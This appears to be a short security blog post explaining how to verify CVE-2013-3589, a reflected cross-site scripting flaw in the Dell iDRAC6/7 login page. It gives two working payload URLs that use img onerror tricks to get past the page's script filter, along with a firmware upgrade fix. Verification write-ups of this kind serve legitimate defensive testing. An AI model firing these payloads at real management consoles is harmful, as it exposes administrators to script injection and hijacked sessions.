Thursday, March 19, 2015

How to verify CVE-2013-3589 (Dell iDRAC 6 and iDRAC 7 XSS Vulnerability)


1.   Nessus description:

The remote Dell Remote Access Controller (iDRAC6 / iDRAC7) is affected by a cross-site scripting vulnerability. The login page does not properly sanitize user-supplied input to the 'ErrorMsg' parameter. An attacker could leverage this to inject arbitrary HTML and script code into a user's browser to be executed within the security context of the affected site.

2.   Demonstration:

1) Actually the login page does filter some Java scripts, so if you use the common script like <script>alert(1)</script>, it won’t work.
2) Example 1: pop up a javascript window.
https://192.168.xxx.xxx/login.html?ErrorMsg=%3Cimg%20src=asdf%20onerror=alert%28%22XSS%22%29%3E





3) Example 2: redirect to https://google.com
https://192.168.xxx.xxx/login.html?ErrorMsg="><img src=x onerror=window.open('https://google.com/');>

3.   Recommendation

1) Upgrade to firmware version 1.96 (iDRAC6) / 1.46.45 (iDRAC7) or later.

4.   References:

1). http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3589
2). http://www.tenable.com/plugins/index.php?view=single&id=70411